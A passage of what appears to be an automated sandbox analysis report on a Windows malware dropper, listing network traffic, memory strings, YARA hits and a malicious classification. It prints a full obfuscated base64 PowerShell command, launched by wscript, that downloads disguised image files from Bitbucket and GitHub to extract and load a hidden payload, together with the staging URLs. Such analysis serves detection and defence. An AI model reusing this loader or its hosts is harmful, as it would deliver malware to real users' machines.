SvJASoF%2Bt2WTzyQjSIHALhmB2AQEunqbDGWETcZMPjKV6%2B8FCeDi3stulqp5tDCBCbWevSBH5q1izI0RCdA49Bw%3D%3D&Expires=1728287751 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
        Source: global trafficDNS traffic detected: DNS query: bitbucket.org
        Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
        Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
        Source: svchost.exe, 0000000A.00000002.3436851309.0000025084884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
        Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
        Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
        Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
        Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
        Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
        Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
        Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
        Source: qmgr.db.10.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
        Source: powershell.exe, 00000008.00000002.2514235788.0000019449F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000008.00000002.2340710949.000001943E12B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000006.00000002.2635327490.00000188234E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.0000019439F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000008.00000002.2340710949.000001943E12B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000006.00000002.2635327490.00000188234FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
        Source: powershell.exe, 00000006.00000002.2635327490.0000018823550000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.0000019439F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000008.00000002.2340710949.000001943E12B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943EC6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943F7BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943F4D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943F794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
        Source: powershell.exe, 00000008.00000002.2340710949.000001943EC6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943F7BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943F794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
        Source: powershell.exe, 00000008.00000002.2340710949.000001943DEED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
        Source: powershell.exe, 00000008.00000002.2340710949.000001943DEED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/4be491a4-012e-46db-bc28-27fee082b0f0/downloads/74ccc5a3-8670-
        Source: powershell.exe, 00000008.00000002.2340710949.000001943DEED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
        Source: powershell.exe, 00000006.00000002.2635327490.0000018823A7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338162714.0000019438316000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338796491.00000194384F4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943E611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.0000019439F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2339496899.0000019439D60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338162714.0000019438290000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338162714.00000194382A5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735
        Source: powershell.exe, 00000008.00000002.2340710949.000001943DEED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/rulmerurk/ertertqw/downloads/po06.txt
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
        Source: powershell.exe, 00000008.00000002.2514235788.0000019449F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000008.00000002.2514235788.0000019449F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000008.00000002.2514235788.0000019449F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
        Source: qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
        Source: svchost.exe, 0000000A.00000003.2293868995.0000025084720000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000008.00000002.2340710949.000001943EC6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943FB37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000008.00000002.2514235788.0000019449F9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
        Source: powershell.exe, 00000006.00000002.2635327490.0000018823A7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2668705652.000001883BA0A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338162714.0000019438316000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338796491.00000194384F4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943E611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.0000019439F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2339496899.0000019439D60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338162714.0000019438290000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2338162714.00000194382A5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000008.00000002.2340710949.000001943A328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2340710949.000001943A15A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49725 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.6:49752 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 16.182.70.97:443 -> 192.168.2.6:49760 version: TLS 1.2

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Reads the System eventlog
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: Process Memory Space: powershell.exe PID: 1776, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 5664, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Wscript starts Powershell (via cmd or directly)
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#CJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF6975A2C54
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF6975A1C0C
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A6CA40_2_00007FF6975A6CA4
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A2DB40_2_00007FF6975A2DB4
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A5D900_2_00007FF6975A5D90
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A1D280_2_00007FF6975A1D28
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A66C40_2_00007FF6975A66C4
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A40C40_2_00007FF6975A40C4
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A35300_2_00007FF6975A3530
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A1C0C0_2_00007FF6975A1C0C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_028D0F409_2_028D0F40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: SecurityJump to behavior
        Source: OTO2wVGgkl.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 6976 bytes, 1 file, at 0x2c +A "123.vbs", ID 527, number 1, 1 datablock, 0x1503 compression
        Source: OTO2wVGgkl.exeStatic PE information: Resource name: RT_RCDATA type: GLS_BINARY_LSB_FIRST
        Source: OTO2wVGgkl.exeBinary or memory string: OriginalFilename vs OTO2wVGgkl.exe
        Source: OTO2wVGgkl.exe, 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs OTO2wVGgkl.exe
        Source: OTO2wVGgkl.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs OTO2wVGgkl.exe
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4476
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4476Jump to behavior
        Source: Process Memory Space: powershell.exe PID: 1776, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 5664, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: 8.2.powershell.exe.1944a15c978.1.raw.unpack, SimpleZip.csCryptographic APIs: 'CreateDecryptor'
        Source: 8.2.powershell.exe.1944a15c978.1.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
        Source: 8.2.powershell.exe.1944a15c978.1.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
        Source: 8.2.powershell.exe.19439ca0000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'CreateDecryptor'
        Source: 8.2.powershell.exe.19439ca0000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
        Source: 8.2.powershell.exe.19439ca0000.0.raw.unpack, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
        Source: classification engineClassification label: mal100.spre.expl.evad.winEXE@15/13@4/4
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A6CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF6975A6CA4
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exeCode function: 0_2_00007FF6975A1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF6975A1C0C
